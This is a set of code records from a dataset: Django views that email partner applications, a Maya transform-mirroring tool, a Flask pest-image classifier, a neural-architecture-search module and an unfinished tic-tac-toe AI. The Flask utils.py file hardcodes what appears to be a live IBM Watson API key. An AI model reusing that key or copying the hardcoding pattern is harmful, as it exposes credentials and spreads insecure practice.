\\n'\n send_mail(\"Заявка от сайта (Поставщик)\",body,False,'', None)\n # article_saved = serializer.save()\n return Response({\"success\": \"Created successfully\"})\n\nclass Profile_SubSupplierView(APIView):\n def get(self, request):\n objects = Profile_SubSupplier.objects.all()\n serializer = Profile_SubSupplier_Serializer(objects, many=True)\n return Response({\"profile-sub-supplier\": serializer.data})\n\n def post(self, request):\n objects = request.data.get('profile-sub-supplier')\n serializer = Profile_SubSupplier_Serializer(data=objects)\n if serializer.is_valid(raise_exception=True):\n serializer.save()\n body = ' Наименование компаний: '+serializer.data.get('company_name') + '\\n Вид деятелности: '+ serializer.data.get('type_activity') + ' \\n ФИО: '+ serializer.data.get('fio') + ' \\n Телефон: '+ serializer.data.get('phone') + ' \\n E-mail: ' + serializer.data.get('mail') + ' \\n Коментарий: ' + serializer.data.get('comment') + ' \\n'\n send_mail(\"Заявка от сайта (Cубдподрядчик)\",body,False,'', None)\n # article_saved = serializer.save()\n return Response({\"success\": \"Created successfully\"}) \n\nclass getPartnersPage(APIView):\n permission_classes = ()\n def get(self,request, *args, **kwargs):\n company_inf = CompanyInformation.objects.first()\n result = {} \n result['comp_inf'] = {'id': company_inf.id, 'phone': company_inf.phone, 'mail':company_inf.mail, 'address': {'ru': company_inf.address_rus, 'kaz': company_inf.address_kaz, 'eng': company_inf.address_eng}}\n\n return Response(result, status=status.HTTP_200_OK) ","sub_path":"partners/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"138575239","text":"\"\"\"\nMirrors an object in specified manner.\nDefaults to mirroring across X axis in translate.\nIn the future, I might make it so you can mirror across multiple axes.\nBut I only need this for one use, that's why I wrote it.\nDefaults to my naming convention of _l_ and _r_ \n\"\"\"\n\n__author__ = \"Alex Widener\"\n__status__ = \"Development\"\n__copyright__ = \"Alex Widener\"\n__email__ = \"alexwidener # gm\"\n__website__ = \"alexwidener.com\"\n\n\nimport traceback\nfrom PySide import QtCore, QtGui\nfrom shiboken import wrapInstance\nimport pymel.core as pm\nimport maya.OpenMayaUI as omui\n\ndef showui():\n main_window_ptr = omui.MQtUtil.mainWindow()\n return wrapInstance(long(main_window_ptr), QtGui.QWidget)\n\nclass AwMirrorObjectXform(QtGui.QDialog):\n\n def __init__(self, parent=showui()):\n super(AwMirrorObjectXform, self).__init__(parent)\n\n def _start(self):\n self.setWindowTitle(\"Mirror Corresponding Object\")\n self.setWindowFlags(QtCore.Qt.Tool)\n\n self._controls()\n self._layout()\n self._connections()\n \n def _controls(self):\n \n self.sel_obj_text = QtGui.QLineEdit(\"\")\n self.update_button = QtGui.QPushButton(\"Update Selected Object\")\n self.mirror_button = QtGui.QPushButton(\"Mirror Object\")\n\n self.axis_label = QtGui.QLabel(\"Axis to mirror across:\")\n self.x_rb = QtGui.QRadioButton(\"X\", self)\n self.y_rb = QtGui.QRadioButton(\"Y\", self)\n self.z_rb = QtGui.QRadioButton(\"Z\", self)\n self.x_rb.setChecked(True)\n\n self.search_label = QtGui.QLabel(\"Search for:\")\n self.search_text = QtGui.QLineEdit(\"_l_\")\n self.replace_label = QtGui.QLabel(\"Replace with:\")\n self.replace_text = QtGui.QLineEdit(\"_r_\")\n\n self.check_trans = QtGui.QCheckBox(\"Tr\")\n self.check_rotate = QtGui.QCheckBox(\"Ro\")\n self.check_scale = QtGui.QCheckBox(\"Sc\")\n self.check_trans.setChecked(True)\n\n def _layout(self):\n \n xyz_layout = QtGui.QHBoxLayout()\n xyz_layout.setContentsMargins(2, 2, 2, 2)\n \n xyz_layout.addWidget(self.x_rb)\n xyz_layout.addWidget(self.y_rb)\n xyz_layout.addWidget(self.z_rb)\n\n trans_layout = QtGui.QHBoxLayout()\n trans_layout.addWidget(self.check_trans)\n trans_layout.addWidget(self.check_rotate)\n trans_layout.addWidget(self.check_scale)\n\n main_layout = QtGui.QVBoxLayout()\n main_layout.setContentsMargins(2, 2, 2, 2)\n \n main_layout.addWidget(self.sel_obj_text)\n main_layout.addWidget(self.update_button)\n\n main_layout.addWidget(self.axis_label)\n main_layout.addLayout(xyz_layout)\n main_layout.addLayout(trans_layout)\n\n main_layout.addWidget(self.search_label)\n main_layout.addWidget(self.search_text)\n main_layout.addWidget(self.replace_label)\n main_layout.addWidget(self.replace_text)\n main_layout.addWidget(self.mirror_button)\n\n self.setLayout(main_layout)\n\n def _connections(self):\n self.update_button.clicked.connect(self.update_sel)\n self.mirror_button.clicked.connect(self.mirror_object)\n \n def mirror_object(self):\n i = 0\n checkedattr = []\n \n obj = self.sel_obj_text.text()\n searchtext = self.search_text.text()\n replacetext = self.replace_text.text()\n \n if not obj:\n pm.error(\"You need something in the Update Object box\")\n else: \n if not searchtext or not replacetext:\n pm.error(\"You need to enter something to search or replace\")\n else: \n if self.x_rb.isChecked():\n i = 0\n if self.y_rb.isChecked():\n i = 1\n if self.z_rb.isChecked():\n i = 2\n if self.check_trans.checkState():\n checkedattr.append('translate')\n if self.check_rotate.checkState():\n checkedattr.append('rotate')\n if self.check_scale.checkState():\n checkedattr.append('scale')\n\n if not checkedattr:\n pm.error(\"No attributes selected\")\n else: \n for eachattr in checkedattr:\n objA = pm.getAttr(obj + '.{0}'.format(eachattr))\n objMirror = obj.replace(searchtext, replacetext)\n pm.select(objMirror)\n e = objMirror + '.{0}'.format(eachattr) \n \n objA[i] = objA[i] * -1\n\n pm.setAttr(e, objA)\n \n def update_sel(self):\n curSel = pm.ls(sl=1)\n if len(curSel) > 1:\n pm.warning(\"Ehhhh, you have more than one object selected.\")\n elif len(curSel) == 0:\n pm.warning(\"Select something first, please.\")\n else:\n for each in curSel:\n self.sel_obj_text.setText(str(each))\n \nif __name__ == \"__main__\":\n try:\n mirrorui.deleteLater()\n except:\n pass\n mirrorui = AwMirrorObjectXform()\n\n try:\n mirrorui._start()\n mirrorui.show()\n except:\n mirrorui.deleteLater()\n traceback.print_exc()\n\n","sub_path":"ui/a_mirrorobj.py","file_name":"a_mirrorobj.py","file_ext":"py","file_size_in_byte":5372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"532734114","text":"import os\nimport secrets\nfrom PIL import Image\nfrom flask import current_app\nfrom watson_developer_cloud import VisualRecognitionV3\nimport json\n\n\ndef save_picture(bug_picture):\n random_hex = secrets.token_hex(8)\n _, f_ext = os.path.splitext(bug_picture.filename)\n picture_fn = random_hex + f_ext\n picture_path = os.path.join(current_app.root_path, 'static/bug_pics', picture_fn)\n\n i = Image.open(bug_picture)\n i.save(picture_path)\n\n return picture_fn\n\ndef bug_recognition(bug_image):\n visual_recognition = VisualRecognitionV3(\n '2018-03-19',\n iam_apikey='KGSz0-fDoeCCyQQLQeWtfXro_RgjEa0PK44S5FPHNlU5')\n\n bug_path = os.path.join(current_app.root_path, 'static/bug_pics', bug_image)\n\n with open(bug_path, 'rb') as images_file:\n classes = visual_recognition.classify(\n images_file,\n threshold='0.6',\n classifier_ids='PestRecognitionModel_39839098').result\n\n try:\n return classes['images'][0]['classifiers'][0]['classes'][0]['class']\n except:\n return 'unknown'\n","sub_path":"whatsThatPest/main/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"643020908","text":"import torch\nimport random\nimport math\nfrom collections import namedtuple\nimport numpy as np\nimport json\nimport os\nfrom datetime import datetime\nimport time\nfrom maskrcnn_benchmark.modeling.search_space import head_ss_keys, inter_ss_keys\nfrom maskrcnn_benchmark.modeling.backbone.search_space import blocks_key\nfrom maskrcnn_benchmark.engine.trainer import generate_rng\nfrom maskrcnn_benchmark.utils.comm import get_world_size, synchronize, get_rank\nfrom maskrcnn_benchmark.engine.inference import inference\nfrom maskrcnn_benchmark.data import make_data_loader\nimport torch.distributed as dist\n\n\nclass TEST_MODEL(object):\n\tdef __init__(self, backbone_rngs, head_rngs, inter_rngs, cycle, \\\n\t\t\t\tpq=None, pq_thing=None, pq_stuff=None, sq=None, rq=None, \\\n\t\t\t\tap_box=None, ap_mask=None, fitness=None, fitness_key=\"pq\"):\n\t\tself.backbone_rngs = backbone_rngs\n\t\tself.head_rngs = head_rngs\n\t\tself.inter_rngs = inter_rngs\n\n\t\tself.backbone_layers = len(backbone_rngs) if backbone_rngs is not None else 0\n\t\tself.head_layers = len(head_rngs)\n\t\tself.inter_layers = len(inter_rngs)\n\n\t\tself.fitness = fitness\n\t\tself.pq = pq\n\t\tself.pq_thing = pq_thing\n\t\tself.pq_stuff = pq_stuff\n\t\tself.sq = sq\n\t\tself.rq = rq\n\t\tself.ap_box = ap_box\n\t\tself.ap_mask = ap_mask\n\t\tself.cycle = cycle\n\n\t\tself.fitness_key = fitness_key\n\n\tdef set_fitness(self, fitness):\n\t\tself.fitness = float(fitness)\n\n\tdef set(self, pq, pq_thing, pq_stuff, sq, rq, ap_box, ap_mask):\n\t\tself.pq = pq\n\t\tself.pq_thing = pq_thing\n\t\tself.pq_stuff = pq_stuff\n\t\tself.sq = sq\n\t\tself.rq = rq\n\t\tself.ap_box = ap_box\n\t\tself.ap_mask = ap_mask\n\n\t@staticmethod\n\tdef reload(l, fitness_key=\"pq\"):\n\t\tassert isinstance(l, dict)\n\t\tloaded_model = TEST_MODEL(l[\"backbone_rngs\"], l['head_rngs'], l['inter_rngs'], l['cycle'])\n\t\tloaded_model.set(l['pq'], l['pq_thing'], l['pq_stuff'], l['sq'], l['rq'], l['ap_box'], l['ap_mask'])\n\t\tloaded_model.set_fitness(l[fitness_key])\n\t\treturn loaded_model\n\n\tdef __repr__(self):\n\t\tinfo = \"TEST_MODEL: [backbone_rngs:{}, head_rngs:{}, inter_rngs:{}, cycle:{}\".format(self.backbone_rngs, self.head_rngs, self.inter_rngs, self.cycle)\n\t\tif self.pq is not None:\n\t\t\tinfo += \", pq:{}, pq_thing:{}, pq_stuff:{}, sq:{}, rq:{}, ap_box:{}, ap_mask:{}]\".format(\n\t\t\t\tself.pq, self.pq_thing, self.pq_stuff, self.sq, self.rq, self.ap_box, self.ap_mask)\n\t\telse:\n\t\t\tinfo += \"]\"\n\t\treturn info\n\n\tdef encode(self): # for broadcast\n\t\tenc = []\n\t\tif self.backbone_rngs is not None:\n\t\t\tenc.extend(self.backbone_rngs)\n\t\tenc.extend(self.head_rngs)\n\t\tenc.extend(self.inter_rngs)\n\t\tenc.append(self.cycle)\n\t\treturn torch.Tensor(enc)\n\n\tdef tolist(self):\n\t\tl = []\n\t\tif self.backbone_rngs is not None:\n\t\t\tl.extend(self.backbone_rngs)\n\t\tl.extend(self.head_rngs)\n\t\tl.extend(self.inter_rngs)\n\t\treturn l, self.cycle\n\n\t@staticmethod\n\tdef fromlist(l, split):\n\t\tassert isinstance(split, list)\n\t\tfor i in range(1, len(split)):\n\t\t\tsplit[i] += split[i-1]\n\t\ttemp = np.split(l, split)\n\t\tmap(lambda x: x.tolist(), temp)\n\t\tassert len(temp[-1]) == 1\n\t\ttemp[-1] = temp[-1][0]\n\t\tif len(split) < 3: # no backbone search\n\t\t\ttemp.insert(0, [])\n\t\treturn temp\n\n\tdef info(self):\n\t\tdef serialize(_input):\n\t\t\tif not isinstance(_input, list):\n\t\t\t\t_input = _input.tolist()\n\t\t\tfor i in range(len(_input)):\n\t\t\t\t_input[i] = int(_input[i])\n\t\t\treturn _input\n\t\tbackbone_rngs = serialize(self.backbone_rngs)\n\t\thead_rngs = serialize(self.head_rngs)\n\t\tinter_rngs = serialize(self.inter_rngs)\n\t\treturn dict(\n\t\t\t\t{\n\t\t\t\t\t'cycle': int(self.cycle),\n\t\t\t\t\t'backbone_rngs': backbone_rngs,\n\t\t\t\t\t'head_rngs': head_rngs,\n\t\t\t\t\t'inter_rngs': inter_rngs,\n\t\t\t\t\t'pq': float(self.pq),\n\t\t\t\t\t'pq_thing': float(self.pq_thing),\n\t\t\t\t\t'pq_stuff': float(self.pq_stuff),\n\t\t\t\t\t'sq': float(self.sq),\n\t\t\t\t\t'rq': float(self.rq),\n\t\t\t\t\t'ap_box': float(self.ap_box),\n\t\t\t\t\t'ap_mask': float(self.ap_mask),\n\t\t\t\t\t'fitness': float(self.fitness)\n\t\t\t\t}\n\t\t\t )\n\nclass PathPrioritySearch(object):\n\t'''\n\t\tDistributed Path Priority Search \n\t'''\n\tdef __init__(self, cfg, base_dir, topk=5, ckp=\"cache_test_log.json\"):\n\t\tself.cfg = cfg.clone()\n\t\tself.ckp = ckp\n\t\tself.topk = topk\n\t\tself.base_dir = base_dir\n\t\tif not os.path.exists(base_dir):\n\t\t\tos.mkdir(base_dir)\n\n\t\tself.num_cycle = self.cfg.NAS.TEST_CYCLE\n\n\t\tself.backbone_layers = sum(self.cfg.MODEL.BACKBONE.STAGE_REPEATS)\n\t\tif self.cfg.MODEL.SEG_BRANCH.SHARE_SUBNET:\n\t\t\tself.head_layers = len(cfg.MODEL.ROI_MASK_HEAD.CONV_LAYERS) + cfg.MODEL.SEG_BRANCH.SUBNET_DEPTH\n\t\telse:\n\t\t\tself.head_layers = len(cfg.MODEL.ROI_MASK_HEAD.CONV_LAYERS) + 4 * cfg.MODEL.SEG_BRANCH.SUBNET_DEPTH\n\t\tself.inter_layers = 9\n\n\t\tself.backbone_ss_size = len(blocks_key)\n\t\tself.head_ss_size = len(head_ss_keys)\n\t\tself.inter_ss_size = len(inter_ss_keys)\n\n\t\tif 'search' in cfg.MODEL.BACKBONE.CONV_BODY:\n\t\t\t_lcm = self.backbone_ss_size*self.head_ss_size//math.gcd(self.backbone_ss_size,self.head_ss_size)\n\t\t\tself.lcm = self.inter_ss_size*_lcm//math.gcd(self.inter_ss_size, _lcm)\n\t\t\tself.search_backbone = True\n\t\telse:\n\t\t\tself.lcm = self.inter_ss_size*self.head_ss_size//math.gcd(self.inter_ss_size, self.head_ss_size)\n\t\t\tself.search_backbone = False\n\n\t\tself.cache_model_list = None # type: list[TEST_MODEL]\n\t\tself.exist_cycle = -1\n\t\tself.new_model_list = None # type: list[TEST_MODEL]\n\n\t\tself.backbone_sb = np.zeros((self.backbone_ss_size, self.backbone_layers), dtype=np.int)\n\t\tself.head_sb = np.zeros((self.head_ss_size, self.head_layers), dtype=np.int)\n\t\tself.inter_sb = np.zeros((self.inter_ss_size, self.inter_layers), dtype=np.int)\n\n\t\tself.rank = get_rank()\n\t\tself.world_size = get_world_size()\n\n\n\tdef generate_fair_test(self): # load cache model and generate new models to test\n\t\tcache_f = self.load_checkpoint()\n\t\tcache_model_list = []\n\t\tnew_model_list = []\n\t\t\n\t\texist_cycle = -1\n\t\t# load evluated results\n\t\tif cache_f is not None:\n\t\t\tprint('length of cache:', len(cache_f))\n\t\t\texist_cycle = len(cache_f) // self.lcm\n\t\t\tprint('existing cycles:', exist_cycle)\n\t\t\tcache_f = cache_f[0: self.lcm * exist_cycle]\n\t\t\tfor m in cache_f:\n\t\t\t\t# t = TEST_MODEL(m['backbone_rngs'], m['head_rngs'], m['inter_rngs'], m['cycle'])\n\t\t\t\t# t.set(m['pq'], m['pq_thing'], m['pq_stuff'], m['sq'], m['rq'], m['ap_box'], m['ap_mask'])\n\t\t\t\t# t.set_fitness(m['pq'])\n\t\t\t\tt = TEST_MODEL(m.get('backbone_rngs'), m.get('head_rngs'), m.get('inter_rngs'), m.get('cycle'))\n\t\t\t\tt.set(m.get('pq'), m.get('pq_thing'), m.get('pq_stuff'), m.get('sq'), m.get('rq'), m.get('ap_box'), m.get('ap_mask'))\n\t\t\t\tt.set_fitness(m.get('pq'))\n\t\t\t\tcache_model_list.append(t)\n\t\t\tprint('Loaded cache models:', cache_model_list)\n\t\telse:\n\t\t\texist_cycle = 0\n\n\t\t# generate new models to evaluate\n\t\tnew_model_enc = None\n\t\t\n\t\tfor c in range(exist_cycle, self.num_cycle):\n\t\t\tif self.search_backbone:\n\t\t\t\tbackbone_rngs = generate_rng(self.backbone_layers, self.backbone_ss_size, self.lcm).transpose(1, 0)\n\t\t\thead_rngs = generate_rng(self.head_layers, self.head_ss_size, self.lcm).transpose(1, 0)\n\t\t\tinter_rngs = generate_rng(self.inter_layers, self.inter_ss_size, self.lcm).transpose(1, 0)\n\t\t\t# rngs = np.concatenate([backbone_rngs, head_rngs, inter_rngs], axis=0).transpose(1, 0)\n\t\t\t\n\t\t\tfor i in range(len(head_rngs)):\n\t\t\t\tif self.search_backbone:\n\t\t\t\t\tnew_model_list.append(TEST_MODEL(backbone_rngs[i], head_rngs[i], inter_rngs[i], c))\n\t\t\t\telse:\n\t\t\t\t\tnew_model_list.append(TEST_MODEL(None, head_rngs[i], inter_rngs[i], c))\n\t\t# if self.rank == 0:\n\t\t# \tprint('rank 0:', new_model_list)\n\n\t\tif exist_cycle < self.num_cycle: \n\t\t\tnew_model_enc = torch.stack([m.encode() for m in new_model_list]).cuda().detach()\n\t\t\t\t\n\t\t\tif self.world_size > 1:\n\t\t\t\tdist.broadcast(new_model_enc, 0)\n\t\t\tnew_model_list = new_model_enc.cpu().numpy().astype(np.int).tolist()\n\t\t\t# convert list to TEST_MODEL\n\t\t\tfor i in range(len(new_model_list)):\n\t\t\t\tif self.search_backbone:\n\t\t\t\t\ttemp = TEST_MODEL.fromlist(new_model_list[i], [self.backbone_layers, self.head_layers, self.inter_layers])\n\t\t\t\telse:\n\t\t\t\t\ttemp = TEST_MODEL.fromlist(new_model_list[i], [self.head_layers, self.inter_layers])\n\t\t\t\tnew_model_list[i] = TEST_MODEL(*temp)\n\t\t# if self.rank == 1:\n\t\t# \tprint('Receive:', new_model_list)\n\n\t\tassert(len(cache_model_list) == self.lcm * exist_cycle), \"len(cache_model_list)={}, lcm * exist_cycle={}, cache_model_list:{}\".format(len(cache_model_list), self.lcm * exist_cycle, cache_model_list)\n\t\tself.cache_model_list = cache_model_list\n\t\tself.new_model_list = new_model_list\n\t\tself.exist_cycle = exist_cycle\n\n\n\tdef score_cycle_model(self, cycle_models, verbose=True):\n\t\tif self.rank == 0: # only rank 0 has results to score\n\t\t\tassert len(cycle_models) == self.lcm, 'models missing in some cycle'\n\t\t\tassert len(set([m.cycle for m in cycle_models])) == 1, 'models are not in a same cycle:\\n{}'.format(cycle_models)\n\t\t\tcur_score = self.lcm - 1\n\t\t\tmodel_list = sorted(cycle_models, key=lambda item: item.fitness, reverse=True)\n\t\t\tfor model in model_list:\n\t\t\t\tif self.search_backbone:\n\t\t\t\t\tself.backbone_sb[model.backbone_rngs, np.arange(self.backbone_layers)] += cur_score\n\t\t\t\tself.head_sb[model.head_rngs, np.arange(self.head_layers)] += cur_score\n\t\t\t\tself.inter_sb[model.inter_rngs, np.arange(self.inter_layers)] += cur_score\n\t\t\t\tcur_score -= 1\n\t\t\tif verbose:\n\t\t\t\tself.myprint('='*15, ' Scoreboard ', '='*15)\n\t\t\t\tself.myprint('backbone:', self.backbone_sb)\n\t\t\t\tself.myprint('head:', self.head_sb)\n\t\t\t\tself.myprint('inter:', self.inter_sb)\n\n\n\tdef save_checkpoint(self, file_name):\n\t\tif self.rank == 0:\n\t\t\toutput = []\n\t\t\tfn = os.path.join(self.base_dir, file_name)\n\t\t\tfor m in self.cache_model_list:\n\t\t\t\toutput.append(m.info())\n\t\t\tprint(\"Saving checkpoint to {}\".format(fn))\n\t\t\twith open(fn, 'w') as f:\n\t\t\t\tjson.dump(output, f)\n\t\t\tsb = {}\n\t\t\tif self.search_backbone:\n\t\t\t\tsb['backbone_sb'] = self.backbone_sb.tolist()\n\t\t\tsb['head_sb'] = self.head_sb.tolist()\n\t\t\tsb['inter_sb'] = self.inter_sb.tolist()\n\t\t\tsb_fn = fn.rstrip('.json') + '_scoreboard.json'\n\t\t\tprint(\"Saving scoreboard to {}\".format(sb_fn))\n\t\t\twith open(sb_fn, 'w') as f:\n\t\t\t\tjson.dump(sb, f)\n\n\n\tdef load_checkpoint(self):\n\t\tcache_f = None\n\t\tckp_fn = os.path.join(self.base_dir, self.ckp)\n\t\tif os.path.exists(ckp_fn):\n\t\t\tprint(\"Using (part of) cached test results from {}\".format(ckp_fn))\n\t\t\tcache_f = json.load(open(ckp_fn, 'r'))\n\t\treturn cache_f\n\n\n\tdef save_topk(self):\n\t\tif self.rank == 0:\n\t\t\td = 'top{}_cycle{}_{}'.format(self.topk, self.num_cycle, datetime.fromtimestamp(time.time()).strftime('%Y%m%d-%H:%M'))\n\t\t\tsave_dir = os.path.join(self.base_dir, d)\n\t\t\tif not os.path.exists(save_dir):\n\t\t\t\tos.mkdir(save_dir)\n\t\t\t# reverse argsort\n\t\t\tif self.search_backbone:\n\t\t\t\tbackbone_topk = np.argsort(self.backbone_sb, axis=0)[-self.topk:][::-1].tolist()\n\t\t\thead_topk = np.argsort(self.head_sb, axis=0)[-self.topk:][::-1].tolist()\n\t\t\tinter_topk = np.argsort(self.inter_sb, axis=0)[-self.topk:][::-1].tolist()\n\t\t\tdef get_min(*a):\n\t\t\t ans = a[0]\n\t\t\t for item in a:\n\t\t\t ans = min(ans, item)\n\t\t\t return ans\n\t\t\tif self.search_backbone:\n\t\t\t\t_min = get_min(self.topk, self.backbone_ss_size, self.head_ss_size, self.inter_ss_size)\n\t\t\telse:\n\t\t\t\t_min = get_min(self.topk, self.head_ss_size, self.inter_ss_size)\n\t\t\tfor i in range(_min):\n\t\t\t\twith open(os.path.join(save_dir, 'model_{}'.format(i)), 'w') as f:\n\t\t\t\t\tprint('***'*10)\n\t\t\t\t\tprint('Saving model_{}'.format(i))\n\t\t\t\t\tif self.search_backbone:\n\t\t\t\t\t\tprint('backbone:', backbone_topk[i])\n\t\t\t\t\tprint('head:', head_topk[i])\n\t\t\t\t\tprint('inter:', inter_topk[i])\n\t\t\t\t\tif self.search_backbone:\n\t\t\t\t\t\tjson.dump(\n\t\t\t\t\t\t\t[{\n\t\t\t\t\t\t\t\t'backbone': backbone_topk[i],\n\t\t\t\t\t\t\t\t'head': head_topk[i],\n\t\t\t\t\t\t\t\t'inter': inter_topk[i],\n\t\t\t\t\t\t\t}], f\n\t\t\t\t\t\t)\n\t\t\t\t\telse:\n\t\t\t\t\t\tjson.dump(\n\t\t\t\t\t\t\t[{\n\t\t\t\t\t\t\t\t'head': head_topk[i],\n\t\t\t\t\t\t\t\t'inter': inter_topk[i],\n\t\t\t\t\t\t\t}], f\n\t\t\t\t\t\t)\n\n\n\tdef _evaluate(self, model, model_cfg, data_loaders, output_folders, dataset_names):\t\t\n\t\tiou_types = (\"bbox\",)\n\t\tif self.cfg.MODEL.MASK_ON:\n\t\t\tiou_types = iou_types + (\"segm\",)\n\t\trngs, _ = model_cfg.tolist()\n\t\tfor output_folder, dataset_name, data_loader in zip(output_folders, dataset_names, data_loaders):\n\t\t\ttemp = inference(\n\t\t\t\t\t\t\tmodel,\n\t\t\t\t\t\t\tdata_loader,\n\t\t\t\t\t\t\tdataset_name=dataset_name,\n\t\t\t\t\t\t\tiou_types=iou_types,\n\t\t\t\t\t\t\tbox_only=self.cfg.MODEL.RPN_ONLY,\n\t\t\t\t\t\t\tdevice=self.cfg.MODEL.DEVICE,\n\t\t\t\t\t\t\texpected_results=self.cfg.TEST.EXPECTED_RESULTS,\n\t\t\t\t\t\t\texpected_results_sigma_tol=self.cfg.TEST.EXPECTED_RESULTS_SIGMA_TOL,\n\t\t\t\t\t\t\toutput_folder=output_folder,\n\t\t\t\t\t\t\tc2d_json_path=self.cfg.MODEL.SEG_BRANCH.JSON_PATH,\n\t\t\t\t\t\t\trngs=rngs,\n\t\t\t\t\t\t\tcfg=self.cfg,\n\t\t\t\t\t\t)\n\t\t\tsynchronize()\n\n\t\t\tdef _list2str(lst):\n\t\t\t\treturn \"\".join(map(lambda x: str(x), lst))\n\n\t\t\tdef _parse(f):\n\t\t\t\t# return int(np.random.randint(0, 100)), 0, 0, 0, 0\n\t\t\t\tif isinstance(f, str):\n\t\t\t\t\tf = open(f, 'r')\n\t\t\t\tfor line in f.readlines():\n\t\t\t\t\tif line.startswith(\"All\"):\n\t\t\t\t\t\td = line.split()\n\t\t\t\t\t\tpq, sq, rq = float(d[2]), float(d[3]), float(d[4])\n\t\t\t\t\telif line.startswith(\"Things\"):\n\t\t\t\t\t\tpq_thing = float(line.split()[2])\n\t\t\t\t\telif line.startswith(\"Stuff\"):\n\t\t\t\t\t\tpq_stuff = float(line.split()[2])\n\t\t\t\tf.close()\n\t\t\t\treturn pq, pq_thing, pq_stuff, sq, rq\n\n\t\t\tif self.rank == 0:\n\t\t\t\tresults, _ = temp\n\t\t\t\tout_dir = os.path.join(self.base_dir, 'test_model_log')\n\t\t\t\tif not os.path.exists(out_dir):\n\t\t\t\t\tos.mkdir(out_dir)\n\t\t\t\tout_file = '{}/test_model_result_{}'.format(out_dir, _list2str(model_cfg.tolist()[0]))\n\t\t\t\tif 'ade' in self.cfg.DATASETS.NAME.lower():\n\t\t\t\t\tprint('Evaluating panoptic results on ADE...')\n\t\t\t\t\tos.system('sh bash_ade_evaluate.sh | tee {}'.format(out_file))\n\t\t\t\telif 'coco' in self.cfg.DATASETS.NAME.lower():\n\t\t\t\t\tprint('Evaluating panoptic results on COCO...')\n\t\t\t\t\tos.system('sh panoptic_scripts/bash_coco_nas_val_evaluate.sh {} | tee {}'.format(self.cfg.OUTPUT_DIR, out_file))\n\t\t\t\telse:\n\t\t\t\t\traise NotImplementedError\n\t\t\t\tap_box = round(results.results['bbox']['AP'] * 100, 2)\n\t\t\t\tap_mask = round(results.results['segm']['AP'] * 100, 2)\n\t\t\t\tpq, pq_thing, pq_stuff, sq, rq = _parse(out_file)\n\t\t\t\tmodel_cfg.set(pq, pq_thing, pq_stuff, sq, rq, ap_box=ap_box, ap_mask=ap_mask)\n\t\t\t\tmodel_cfg.set_fitness(pq)\n\t\t\tsynchronize() \n\t\treturn model_cfg\n\n\tdef myprint(self, *s):\n\t\tif self.rank == 0:\n\t\t\tprint(*s)\n\n\tdef search(self, model, output_folders, dataset_names, distributed):\n\t\tself.myprint('[x]: Begin path priority search...')\n\t\tmodel.eval()\n\t\tif self.exist_cycle >= self.num_cycle: # cached results are enough\n\t\t\tself.myprint('[x]: Using cached model results')\n\t\t\tfor i in range(self.num_cycle):\n\t\t\t\tmodels_this_cycle = self.cache_model_list[i*self.lcm : (i+1)*self.lcm]\n\t\t\t\tself.score_cycle_model(models_this_cycle)\n\t\telse:\n\t\t\tfor i in range(self.exist_cycle, self.num_cycle):\n\t\t\t\tmodels_this_cycle = self.new_model_list[i*self.lcm : (i+1)*self.lcm]\n\t\t\t\tfor i in range(len(models_this_cycle)):\n\t\t\t\t\tdataloaders_nas_val = make_data_loader(self.cfg, is_train=False, is_distributed=distributed)\n\t\t\t\t\tmodel_cfg = models_this_cycle[i]\n\t\t\t\t\tself.myprint('[x]: Evaluating model {}'.format(model_cfg))\n\t\t\t\t\tmodel_cfg = self._evaluate(model, model_cfg, dataloaders_nas_val, output_folders, dataset_names)\n\t\t\t\t\tself.myprint('[x]: Evaluation complete, saving checkpoint...')\n\t\t\t\t\tself.cache_model_list.append(model_cfg)\n\t\t\t\t\tself.myprint('[x]: Cached: ', self.cache_model_list)\n\t\t\t\t\tmodels_this_cycle[i] = model_cfg\n\t\t\t\t\tself.save_checkpoint(self.ckp)\n\t\t\t\tself.score_cycle_model(models_this_cycle)\n\n\t\tself.myprint('[x]: Searching complete, saving...')\n\t\tself.save_checkpoint(\"final_test_log.json\")\n\n","sub_path":"maskrcnn-benchmark/maskrcnn_benchmark/engine/architecture_search.py","file_name":"architecture_search.py","file_ext":"py","file_size_in_byte":15258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"617958169","text":"import sys\nimport os\nimport random\nimport copy\n\nclass AI:\n def __init__(self, name, playerType, random=False, smart=False):\n self.name = name\n self.playerType = playerType\n self.turn = 0\n self.random = random\n self.smart = smart\n self.currentTurns = [] # store moves of the current game\n self.turnData = {} #{'key': [[[0,0,0],[0,0,0],[0,0,0]], 0]} #index 0 stores perecentage win rate of each position at the scenario 'key', index 1 stores total amount of turns taken at this scenario\n self.keys = {'1': (0,0), '2': (1,0), '3': (2,0), '4': (0,1), '5': (1,1), '6': (2,1), '7': (0,2), '8': (1,2), '9': (2,2)}\n \n def saveTurnData(self):\n def toStr(turnData):\n data = ''\n for row in turnData[0]:\n for elem in row:\n data += str(elem) + ','\n data += str(turnData[1]) \n return data\n \n file = open(self.name + '_turnData.txt','w')\n for key in self.turnData:\n file.write(key)\n file.write(',')\n file.write(toStr(self.turnData[key]))\n file.write('\\n')\n file.close() \n \n def getTurnData(self):\n def makeArray(data):\n output = []\n temp = []\n for elem in data:\n if elem not in ['X','O','_']:\n temp.append(int(elem))\n else:\n temp.append(elem)\n if len(temp) == 3:\n output.append(temp)\n temp = []\n \n return output\n fName = self.name +'_turnData.txt'\n if os.path.exists(fName):\n file = open(fName,'r')\n data = {}\n for elem in file.readlines():\n elem_array = elem.strip('\\n').split(',')\n key = elem_array[0]\n data[key] = [makeArray(elem_array[1:-1]), int(elem_array[-1])]\n \n self.turnData = data\n\n def boardToKey(self, board):\n key = ''\n for row in board:\n for elem in row:\n key+=elem\n return key\n \n def getRandomTurn(self, board):\n history = {}\n x = random.randint(0,2)\n y = random.randint(0,2)\n history[(x,y)] = True\n while history.get((x,y)) and board[y][x] in ['X', 'O']:\n x = random.randint(0,2)\n y = random.randint(0,2)\n history[(x,y)] = True\n return (x,y)\n \n def getWinningMove(self, board, player):\n def checkRow(rowNum, playerType):\n count = 0\n for column in range(3):\n if board[rowNum][column] == playerType:\n count += 1\n elif board[rowNum][column] != '_':\n count -= 1\n else:\n target = column\n if count == 2:\n return (target, rowNum)\n return False\n \n 